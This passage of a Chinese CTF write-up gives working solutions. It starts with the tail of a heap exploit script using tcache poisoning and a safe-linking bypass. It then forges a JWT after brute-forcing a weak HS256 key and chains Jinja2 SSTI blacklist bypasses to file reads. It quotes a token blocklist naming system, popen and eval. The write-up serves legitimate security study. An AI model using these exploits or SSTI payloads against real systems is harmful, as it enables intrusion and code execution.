r.recvuntil(b'slot:'); r.sendline(str(slot).encode())\n        r.recvuntil(b'manifest size:'); r.sendline(str(size).encode())\n        r.recvuntil(b'tag:'); r.sendline(tag)\n        r.recvuntil(b'manifest bytes:'); r.send(data); r.recvuntil(b'&gt;')\n\n    def scrap_slot(slot):\n        r.sendline(b'4'); r.recvuntil(b'slot:')\n        r.sendline(str(slot).encode()); r.recvuntil(b'&gt;')\n\n    # Heap leak\n    create(0, 128, b'AAAA', b'B'*128)\n    resp = b''; r.sendline(b'3'); r.recvuntil(b'slot:'); r.sendline(b'0')\n    resp = r.recvuntil(b'&gt;')\n    manifest0 = int(re.search(rb'manifest ptr: (0x&#91;0-9a-f]+)', resp).group(1), 16)\n\n    # Setup tcache (4 entries in 0x30 bin)\n    create(1, 32, b'VICT', b'V'*32)\n    create(3, 32, b'VIC2', b'W'*32)\n    create(2, 256, b'PADD', b'P'*256)  # protect top chunk\n    scrap_slot(3); scrap_slot(1)\n\n    # Safe-linking calc\n    manifest1_user = manifest0 + 0xC0\n    xor_key = manifest1_user &gt;&gt; 12\n    mangled_fd = target_ptr ^ xor_key\n\n    # Overflow: repack slot 0, segments=9\n    payload  = b'\\x00'*0x20 + p64(0) + p64(0x31) + p64(mangled_fd) + p64(0)\n    payload += b'\\x00'*(288 - len(payload))\n    r.sendline(b'2'); r.recvuntil(b'slot:'); r.sendline(b'0')\n    r.recvuntil(b'segment count:'); r.sendline(b'9')\n    r.recvuntil(b'manifest bytes:'); r.send(payload); r.recvuntil(b'&gt;')\n\n    # Poisoned alloc \u2192 overwrite function ptr\n    r.sendline(b'1'); r.recvuntil(b'slot:'); r.sendline(b'1')\n    r.recvuntil(b'manifest size:'); r.sendline(b'32')\n    r.recvuntil(b'tag:'); r.sendline(b'X')\n    r.recvuntil(b'manifest bytes:')\n    r.send(b'\\x00'*8 + p64(win_addr) + b'\\x00'*16)\n    r.recvuntil(b'&gt;')\n\n    # Trigger: Exit \u2192 call func ptr \u2192 win\n    r.sendline(b'5')\n    data = r.recvall(timeout=8)\n    print(data.decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{4090ecf1-31b2-4108-905f-ff06418236d2}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"web\">Web<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u8d22\u52a1\u5df2\u9605\">\u8d22\u52a1\u5df2\u9605<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5ba1\u6279\u6d41\u5076\u5c14\u4e5f\u4f1a\u8ba4\u9519\u8def\uff0c\u5c24\u5176\u662f\u770b\u5230 finance. \u5f00\u5934\u7684\u65f6\u5019<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u58a8\u4ed3\u4e91\u91c7\u4f9b\u5e94\u5546\u5bf9\u8d26\u4e2d\u5fc3\u662f\u4e00\u4e2a\u4e09\u89d2\u8272\uff08\u4f9b\u5e94\u5546\/\u8d22\u52a1\/\u8fd0\u8425\uff09\u5de5\u4f5c\u6d41\u7cfb\u7edf\u3002\u8d22\u52a1 <code>finance_pass<\/code> \u4f1a\u5c06\u5355\u636e\u8def\u7531\u5230\u98ce\u63a7\u6302\u8d77\uff08RISK_HOLD\uff09\uff0c\u9700\u8fd0\u8425 <code>risk_release<\/code> \u624d\u80fd\u5f52\u6863\u3002Flag \u85cf\u5728\u5f52\u6863\u540e\u7684\u4ed8\u6b3e\u56de\u5355\u63a5\u53e3 <code>\/api\/settlements\/{id}\/receipt<\/code> \u4e2d\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u83b7\u53d6\u6d4b\u8bd5\u8d26\u53f7\u5e76\u7406\u89e3\u5de5\u4f5c\u6d41\">1: \u83b7\u53d6\u6d4b\u8bd5\u8d26\u53f7\u5e76\u7406\u89e3\u5de5\u4f5c\u6d41<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u5f55\u9875\u76f4\u63a5\u63d0\u4f9b\u4e86\u4e09\u4e2a\u6d4b\u8bd5\u8d26\u53f7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u8d26\u53f7<\/th><th>\u5bc6\u7801<\/th><th>\u89d2\u8272<\/th><th>\u53ef\u7528\u64cd\u4f5c<\/th><\/tr><\/thead><tbody><tr><td><code>supplier_chen<\/code><\/td><td><code>MingCang@101<\/code><\/td><td>\u4f9b\u5e94\u5546<\/td><td><code>supplier_submit<\/code> \u2192 \u8d22\u52a1\u590d\u6838\u4e2d<\/td><\/tr><tr><td><code>finance_lin<\/code><\/td><td><code>Finance#2026<\/code><\/td><td>\u8d22\u52a1<\/td><td><code>finance_pass<\/code> \u2192 \u98ce\u63a7\u6302\u8d77<\/td><\/tr><tr><td><code>ops_wu<\/code><\/td><td><code>Ops#2026<\/code><\/td><td>\u91c7\u8d2d\u8fd0\u8425<\/td><td><code>risk_release<\/code> \u2192 \u5df2\u4ed8\u6b3e\u5f52\u6863<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u793a&#8221;\u5ba1\u6279\u6d41\u5076\u5c14\u4e5f\u4f1a\u8ba4\u9519\u8def\uff0c\u5c24\u5176\u662f\u770b\u5230 finance. \u5f00\u5934\u7684\u65f6\u5019&#8221;\u2014\u2014<code>finance_pass<\/code> \u672c\u5e94\u76f4\u63a5\u5f52\u6863\uff0c\u5374\u88ab\u9519\u8bef\u8def\u7531\u5230\u98ce\u63a7\u6302\u8d77\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u8d70\u5b8c\u4e09\u8282\u70b9\u5b8c\u6574\u6d41\u7a0b\">2: \u8d70\u5b8c\u4e09\u8282\u70b9\u5b8c\u6574\u6d41\u7a0b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4efb\u4e00\u5f85\u5904\u7406\u5355\u636e\u4f9d\u6b21\u63d0\u4ea4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import requests\n\n    BASE = \"http:\/\/8080-f8e0ec92-2443-4c32-afbb-70e089298c60.challenge.ctfplus.cn\"\n\n    def login(username, password):\n        s = requests.Session()\n        s.post(f\"{BASE}\/login\", data={\"username\": username, \"password\": password})\n        return s\n\n    def action(session, business_no, action_name):\n        return session.post(f\"{BASE}\/api\/settlements\/{business_no}\/actions\",\n            json={\"action\": action_name, \"memo\": \"\", \"proofCode\": \"\"}).json()\n\n    # \u4f9b\u5e94\u5546\u63d0\u4ea4\n    s1 = login(\"supplier_chen\", \"MingCang@101\")\n    action(s1, \"MC-202604-0091\", \"supplier_submit\")  # \u2192 FINANCE_REVIEW\n\n    # \u8d22\u52a1\u590d\u6838\uff08\u8d70\u5230\u98ce\u63a7\u6302\u8d77\u2014\u2014\u5ba1\u6279\u6d41 bug\uff09\n    s2 = login(\"finance_lin\", \"Finance#2026\")\n    action(s2, \"MC-202604-0091\", \"finance_pass\")    # \u2192 RISK_HOLD\n\n    # \u8fd0\u8425\u91ca\u653e\n    s3 = login(\"ops_wu\", \"Ops#2026\")\n    action(s3, \"MC-202604-0091\", \"risk_release\")    # \u2192 ARCHIVED_PAID<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u8bfb\u53d6\u5f52\u6863\u56de\u5355\">3: \u8bfb\u53d6\u5f52\u6863\u56de\u5355<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>resp = s3.get(f\"{BASE}\/api\/settlements\/MC-202604-0091\/receipt\").json()\nprint(resp&#91;\"receipt\"])\n# \u4ed8\u6b3e\u6d41\u6c34 MC-PAY-202604-0091 \/ \u5f52\u6863\u6821\u9a8c\u7801\uff1aFLAG{...}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{9f7e15fa-005b-4431-a85e-2a3a4a1bf085}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4e00\u679a\u997c\u5e72\u7684\u8d8a\u6743\u822a\u7ebf\">\u4e00\u679a\u997c\u5e72\u7684\u8d8a\u6743\u822a\u7ebf<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6709\u4e9b\u6865\u53eb legacy\uff0c\u6709\u4e9b\u94a5\u5319\u4e5f\u5f88 legacy\u3002\u8001\u7cfb\u7edf\u7684\u5473\u9053\uff0c\u5f80\u5f80\u85cf\u5728\u65e5\u671f\u548c\u73af\u5883\u540d\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u793a\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 1: \u767b\u5f55\u540e\u4e0d\u8981\u53ea\u770b\u9875\u9762\u5185\u5bb9\uff0c\u91cd\u70b9\u89c2\u5bdf\u670d\u52a1\u7aef\u4e0b\u53d1\u7684 session Cookie\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 2: session \u7684\u7ed3\u6784\u53ef\u80fd\u80fd\u88ab\u89e3\u6790\uff0c\u770b\u770b\u5b83\u662f\u4e0d\u662f JWT\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 3: \u6ce8\u610f JWT \u7684 alg\u3001kid\u3001iss\uff0c\u4ee5\u53ca payload \u4e2d\u7684 role\u3001tenant\u3001scopes\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 4: \/api\/audit\/identity-bridge \u91cc\u7684 legacy SSO \u4fe1\u606f\u4e0d\u662f\u6446\u8bbe\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 5: HS256 \u4f7f\u7528\u5bf9\u79f0\u5bc6\u94a5\uff0c\u62ff\u5230\u5408\u6cd5 token \u540e\u53ef\u4ee5\u5c1d\u8bd5\u79bb\u7ebf\u9a8c\u8bc1\u5f31\u5bc6\u94a5\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 6: \u5bc6\u94a5\u66f4\u50cf\u4e1a\u52a1\u7ebf\u7d22\u62fc\u51fa\u6765\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u4e0d\u662f\u7eaf\u968f\u673a\u53e3\u4ee4\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 7: \u7ba1\u7406\u5458\u63a5\u53e3\u4e0d\u4ec5\u68c0\u67e5 role\uff0c\u8fd8\u53ef\u80fd\u68c0\u67e5 tenant \u548c scopes\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 8: \u76ee\u6807\u63a5\u53e3\u662f \/admin\/settlements\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">DockLine Partner Portal \u4f7f\u7528 HS256 \u7b7e\u540d JWT \u4f5c\u4e3a session Cookie\u3002kid \u4e3a <code>legacy-prod-202402<\/code>\uff0ciss \u4e3a <code>dockline-sso<\/code>\u3002\u8eab\u4efd\u6865\u63a5\u63a5\u53e3 <code>\/api\/audit\/identity-bridge<\/code> \u6cc4\u9732\u4e86\u5b8c\u6574\u7684 JWT \u914d\u7f6e\u6307\u7eb9\u3002\u901a\u8fc7\u4e1a\u52a1\u5173\u952e\u8bcd\u6392\u5217\u7ec4\u5408\u7206\u7834\u51fa\u5f31\u5bf9\u79f0\u5bc6\u94a5 <code>dockline-prod-202402<\/code>\uff0c\u4f2a\u9020 admin \u89d2\u8272 JWT \u8bbf\u95ee <code>\/admin\/settlements<\/code> \u83b7\u53d6 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u767b\u5f55\u83b7\u53d6-jwt\">1: \u767b\u5f55\u83b7\u53d6 JWT<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u5f55\u9875\u9884\u586b\u4e86\u6d4b\u8bd5\u51ed\u8bc1 <code>carrier.ops@harbor.test<\/code> \/ <code>Harbor@2026<\/code>\uff0cPOST <code>\/api\/login<\/code> \u540e\u5728 <code>Set-Cookie: session=<\/code> \u62ff\u5230 JWT\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    Header:  {\"alg\":\"HS256\",\"typ\":\"JWT\",\"kid\":\"legacy-prod-202402\"}\n    Payload: {\"role\":\"carrier\",\"tenant\":\"harbor\",\"scopes\":&#91;\"shipment:read\",\"invoice:read\"],\"iss\":\"dockline-sso\"}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u679a\u4e3e\u5f31\u5bc6\u94a5\">2: \u679a\u4e3e\u5f31\u5bc6\u94a5<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee <code>\/api\/audit\/identity-bridge<\/code> \u83b7\u53d6 SSO \u8bca\u65ad\u4fe1\u606f\u2014\u2014\u670d\u52a1\u540d <code>legacy-sso-bridge<\/code>\u3001owner <code>finance-platform<\/code>\u3001issuer <code>dockline-sso<\/code>\u3002\u63d0\u793a\u660e\u786e\u8bf4\u660e HS256 \u4f7f\u7528\u5bf9\u79f0\u5bc6\u94a5\u4e14&#8221;\u5bc6\u94a5\u66f4\u50cf\u4e1a\u52a1\u7ebf\u7d22\u62fc\u51fa\u6765\u7684\u5b57\u7b26\u4e32&#8221;\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06 <code>kid<\/code>\u3001<code>iss<\/code>\u3001\u670d\u52a1\u540d\u7b49\u5173\u952e\u8bcd\u505a\u6392\u5217\u7ec4\u5408\uff0cHMAC-SHA256 \u7b7e\u540d\u6bd4\u5bf9\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import hmac, hashlib, base64, json, time, itertools\n\n    token = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImxlZ2FjeS1wcm9kLTIwMjQwMiJ9.eyJzdWIiOiJ1c3JfNDgyOSIsImVtYWlsIjoiY2Fycmllci5vcHNAaGFyYm9yLnRlc3QiLCJuYW1lIjoiSGFyYm9yIEZyZWlnaHQgT3BzIiwiY29tcGFueSI6IkhhcmJvciBGcmVpZ2h0IENvLiIsInJvbGUiOiJjYXJyaWVyIiwidGVuYW50IjoiaGFyYm9yIiwic2NvcGVzIjpbInNoaXBtZW50OnJlYWQiLCJpbnZvaWNlOnJlYWQiXSwiaWF0IjoxNzc4OTE0MDExLCJleHAiOjE3Nzg5MjEyMTEsImlzcyI6ImRvY2tsaW5lLXNzbyJ9.FdYEmqnSMMYXdOKKr7mp7pdMaeV-BeLU6sXYzRnTpFM\"\n    sig = token.split('.')&#91;2]\n    data = '.'.join(token.split('.')&#91;:2])\n\n    terms = &#91;\"dockline\", \"legacy\", \"prod\", \"202402\", \"finance\", \"platform\", \"sso\", \"bridge\", \"harbor\"]\n    for r in range(2, 6):\n        for combo in itertools.permutations(terms&#91;:6], r):\n            for sep in &#91;'-', '_', ':']:\n                key = sep.join(combo)\n                check = base64.urlsafe_b64encode(hmac.new(key.encode(), data.encode(), hashlib.sha256).digest()).rstrip(b'=').decode()\n                if check == sig:\n                    print(f\"FOUND: {key}\")  # dockline-prod-202402\n                    break<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u4f2a\u9020-admin-jwt\">3: \u4f2a\u9020 Admin JWT<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u6062\u590d\u7684\u5bc6\u94a5\u7b7e\u540d\u65b0\u7684 JWT\uff0c\u5c06 <code>role<\/code> \u6539\u4e3a <code>admin<\/code>\u3001<code>tenant<\/code> \u6539\u4e3a <code>dockline<\/code>\uff0c\u589e\u52a0 <code>admin:read<\/code> \u7b49 scope\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    KEY = \"dockline-prod-202402\"\n    header = {\"alg\":\"HS256\",\"typ\":\"JWT\",\"kid\":\"legacy-prod-202402\"}\n    payload = {\"sub\":\"usr_1001\",\"email\":\"mara.wei@dockline.internal\",\"name\":\"Mara Wei\",\"company\":\"DockLine\",\n               \"role\":\"admin\",\"tenant\":\"dockline\",\n               \"scopes\":&#91;\"settlement:read\",\"admin:read\",\"finance:read\",\"settlement:write\"],\n               \"iat\":int(time.time()),\"exp\":int(time.time())+7200,\"iss\":\"dockline-sso\"}\n\n    h = base64.urlsafe_b64encode(json.dumps(header,separators=(',',':')).encode()).rstrip(b'=').decode()\n    p = base64.urlsafe_b64encode(json.dumps(payload,separators=(',',':')).encode()).rstrip(b'=').decode()\n    s = base64.urlsafe_b64encode(hmac.new(KEY.encode(),f\"{h}.{p}\".encode(),hashlib.sha256).digest()).rstrip(b'=').decode()\n    admin_jwt = f\"{h}.{p}.{s}\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee <code>\/admin\/settlements<\/code> \u5e26 <code>Cookie: session={admin_jwt}<\/code> \u5373\u8fd4\u56de flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{554ef4ab-2e32-4b69-945c-47a70341e41b}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5de5\u5355\u522b\u4e71\u586b\">\u5de5\u5355\u522b\u4e71\u586b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u552e\u540e\u540c\u5b66\u8bf4\u8fd9\u4e2a\u6a21\u677f\u53ea\u80fd\u586b\u4e1a\u52a1\u53d8\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u6a21\u677f\u5f15\u64ce\u597d\u50cf\u6709\u70b9\u592a\u70ed\u5fc3\u4e86\uff1a\u4f60\u5199\u4ec0\u4e48\uff0c\u5b83\u90fd\u60f3\u5e2e\u4f60\u7b97\u4e00\u7b97\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5ba1\u8ba1\u7cfb\u7edf\u4e5f\u5728\u52aa\u529b\u4e0a\u73ed\uff0c\u53ea\u662f\u5b83\u53ef\u80fd\u4e0d\u592a\u8ba4\u8bc6\u201c\u6362\u4e86\u9a6c\u7532\u201d\u7684\u5b57\u7b26\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u9875\u770b\u8d77\u6765\u662f\u4e00\u4e2a\u5f88\u6b63\u5e38\u7684\u6a21\u677f\u9884\u89c8\u7cfb\u7edf\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528\u6237\u53ef\u4ee5\u7f16\u8f91 <code>title<\/code>\u3001<code>body<\/code>\u3001<code>footer<\/code><\/li>\n\n\n\n<li>\u9875\u9762\u63d0\u793a\u652f\u6301 <code>[[ ticket.id ]]<\/code>\u3001<code>[[ team.name ]]<\/code> \u8fd9\u4e00\u7c7b\u5360\u4f4d\u7b26<\/li>\n\n\n\n<li>\u70b9\u51fb\u201c\u9884\u89c8\u201d\u540e\uff0c\u524d\u7aef\u4f1a\u5411 <code>\/api\/preview<\/code> \u53d1\u9001 JSON \u8bf7\u6c42<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u6838\u5fc3\u903b\u8f91\u975e\u5e38\u76f4\u63a5\uff1a const response = await fetch(&#8220;\/api\/preview&#8221;, { method: &#8220;POST&#8221;, headers: { &#8220;Content-Type&#8221;: &#8220;application\/json&#8221; }, body: JSON.stringify(payload), });<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\u57fa\u672c\u53ef\u4ee5\u786e\u5b9a\uff0c\u771f\u6b63\u7684\u653b\u51fb\u9762\u5728\u670d\u52a1\u7aef\u6a21\u677f\u6e32\u67d3\u6d41\u7a0b\uff0c\u800c\u4e0d\u662f\u524d\u7aef\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6f0f\u6d1e\u786e\u8ba4\">\u6f0f\u6d1e\u786e\u8ba4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e00\u6b65\u5148\u9a8c\u8bc1\u6a21\u677f\u8868\u8fbe\u5f0f\u662f\u5426\u4f1a\u88ab\u6267\u884c\uff1a [[ 7*7 ]]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56de\u663e\u7ed3\u679c\u4e3a\uff1a 49<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5df2\u7ecf\u8db3\u591f\u8bf4\u660e\u95ee\u9898\uff1a\u7528\u6237\u8f93\u5165\u5e76\u4e0d\u662f\u88ab\u5f53\u4f5c\u666e\u901a\u5b57\u7b26\u4e32\u5904\u7406\uff0c\u800c\u662f\u88ab\u9001\u8fdb\u4e86 Jinja2 \u6a21\u677f\u5f15\u64ce\u6267\u884c\u3002\u8fd9\u5c31\u662f\u6807\u51c6\u7684 <strong>SSTI<\/strong>\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6e90\u7801\u8fd8\u539f\u4e0e\u95ee\u9898\u672c\u8d28\">\u6e90\u7801\u8fd8\u539f\u4e0e\u95ee\u9898\u672c\u8d28<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ee7\u7eed\u5229\u7528 SSTI \u8bfb\u53d6\u6e90\u7801\u540e\uff0c\u53ef\u4ee5\u8fd8\u539f\u51fa\u6838\u5fc3\u903b\u8f91\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    PLACEHOLDER_RE = re.compile(r\"\\&#91;\\&#91;\\s*(.*?)\\s*\\]\\]\", re.DOTALL)\n\n    BLOCKED_TOKENS = (\n        \"{{\", \"}}\", \"{%\", \"%}\",\n        \"__\", \"class\", \"mro\", \"subclasses\",\n        \"globals\", \"builtins\", \"import\",\n        \"eval\", \"exec\", \"popen\", \"system\",\n        \"os\", \"config\", \"request\", \"flag\", \"\/\",\n    )\n\n    def compile_template(source: str) -&gt; str:\n        return PLACEHOLDER_RE.sub(lambda match: \"{{ \" + match.group(1) + \" }}\", source)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u7684\u8bbe\u8ba1\u95ee\u9898\u975e\u5e38\u660e\u663e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4e1a\u52a1\u5360\u4f4d\u7b26 <code>[[ ... ]]<\/code> \u88ab\u76f4\u63a5\u8f6c\u6362\u6210\u4e86 Jinja2 \u8868\u8fbe\u5f0f <code>{{ ... }}<\/code>\u3002<\/li>\n\n\n\n<li>\u7528\u6237\u8f93\u5165\u6ca1\u6709\u8fdb\u5165\u5b89\u5168\u767d\u540d\u5355\u89e3\u6790\uff0c\u800c\u662f\u8fdb\u5165\u4e86\u771f\u5b9e\u6a21\u677f\u6267\u884c\u73af\u5883\u3002<\/li>\n\n\n\n<li>\u6240\u8c13\u201c\u9632\u62a4\u201d\u53ea\u662f\u7b80\u5355\u7684\u9ed1\u540d\u5355\u5b57\u7b26\u4e32\u5339\u914d\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9632\u62a4\u7684\u6839\u672c\u7f3a\u9677\u5728\u4e8e\uff1a<strong>\u5b83\u62e6\u7684\u662f\u5b57\u9762\u91cf\uff0c\u4e0d\u662f\u8bed\u4e49\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6bd4\u5982\u5b83\u7981\u6b62 <code>globals<\/code>\uff0c\u4f46\u5e76\u4e0d\u80fd\u963b\u6b62\u6211\u4eec\u5199\u6210\uff1a &#8216;glo&#8217; ~ &#8216;bals&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u7406\uff0c<code>os<\/code>\u3001<code>builtins<\/code>\u3001<code>flag<\/code>\u3001<code>\/<\/code> \u90fd\u53ef\u4ee5\u88ab\u8fd0\u884c\u65f6\u62fc\u63a5\u51fa\u6765\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5229\u7528\u601d\u8def\">\u5229\u7528\u601d\u8def<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u7a33\u5b9a\u7684\u5229\u7528\u94fe\u6765\u81ea Jinja2 \u5185\u7f6e\u5bf9\u8c61 <code>lipsum<\/code>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>lipsum<\/code> \u662f\u4e00\u4e2a\u51fd\u6570\u5bf9\u8c61\uff0c\u800c\u51fd\u6570\u5bf9\u8c61\u5929\u7136\u5e26\u6709 <code>__globals__<\/code>\u3002\u867d\u7136\u9898\u76ee\u62e6\u622a\u4e86 <code>__<\/code> \u548c <code>globals<\/code>\uff0c\u4f46\u7531\u4e8e\u53ea\u662f\u9ed1\u540d\u5355\uff0c\u53ef\u4ee5\u901a\u8fc7\u5b57\u7b26\u4e32\u62fc\u63a5\u7ed5\u8fc7\uff1a lipsum|attr(&#8216;<em>&#8216;~&#8217;<\/em>&#8216;~&#8217;glo&#8217;~&#8217;bals&#8217;~&#8217;<em>&#8216;~&#8217;<\/em>&#8216;)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u62ff\u5230 <code>__globals__<\/code> \u540e\uff0c\u5c31\u53ef\u4ee5\u8fdb\u4e00\u6b65\u8bbf\u95ee\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>os<\/code><\/li>\n\n\n\n<li><code>__builtins__<\/code><\/li>\n\n\n\n<li><code>open<\/code><\/li>\n\n\n\n<li><code>chr<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u6574\u6761\u5229\u7528\u94fe\u5c31\u6210\u578b\u4e86\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u901a\u8fc7 <code>lipsum<\/code> \u62ff\u5230 <code>__globals__<\/code><\/li>\n\n\n\n<li>\u4ece\u4e2d\u53d6\u51fa <code>__builtins__<\/code><\/li>\n\n\n\n<li>\u7528 <code>chr(47)<\/code> \u6784\u9020 <code>\/<\/code><\/li>\n\n\n\n<li>\u7528 <code>chr(102) chr(108) chr(97) chr(103)<\/code> \u6784\u9020 <code>flag<\/code><\/li>\n\n\n\n<li>\u8c03\u7528 <code>open('\/flag').read()<\/code> \u8bfb\u53d6\u6587\u4ef6<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5173\u952e\u5229\u7528\u8fc7\u7a0b\">\u5173\u952e\u5229\u7528\u8fc7\u7a0b<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u9a8c\u8bc1\u8868\u8fbe\u5f0f\u6267\u884c\">1. \u9a8c\u8bc1\u8868\u8fbe\u5f0f\u6267\u884c<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;&#91; 7*7 ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\uff1a 49<\/p>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"2-\u786e\u8ba4\u53ef\u4ee5\u6478\u5230-lipsum-globals\">2. \u786e\u8ba4\u53ef\u4ee5\u6478\u5230 <code>lipsum.__globals__<\/code><\/h6>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;&#91; lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_') ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56de\u663e\u91cc\u53ef\u4ee5\u770b\u5230\u6a21\u5757\u5168\u5c40\u53d8\u91cf\uff0c\u5305\u62ec <code>os<\/code> \u548c <code>__builtins__<\/code>\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-\u5217\u6839\u76ee\u5f55\">3. \u5217\u6839\u76ee\u5f55<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528 <code>os.listdir('\/')<\/code> \u7684\u53d8\u4f53\uff0c\u628a <code>\/<\/code> \u52a8\u6001\u62fc\u51fa\u6765\uff1a [[ ((lipsum|attr(&#8216;<em>&#8216;~&#8217;<\/em>&#8216;~&#8217;glo&#8217;~&#8217;bals&#8217;~&#8217;<em>&#8216;~&#8217;<\/em>&#8216;)).get(&#8216;o&#8217;~&#8217;s&#8217;)|attr(&#8216;listdir&#8217;)(((lipsum|attr(&#8216;<em>&#8216;~&#8217;<\/em>&#8216;~&#8217;glo&#8217;~&#8217;bals&#8217;~&#8217;<em>&#8216;~&#8217;<\/em>&#8216;)).get(&#8216;<em>&#8216;~&#8217;<\/em>&#8216;~&#8217;buil&#8217;~&#8217;tins&#8217;~&#8217;<em>&#8216;~&#8217;<\/em>&#8216;)).get(&#8216;chr&#8217;)(47))) 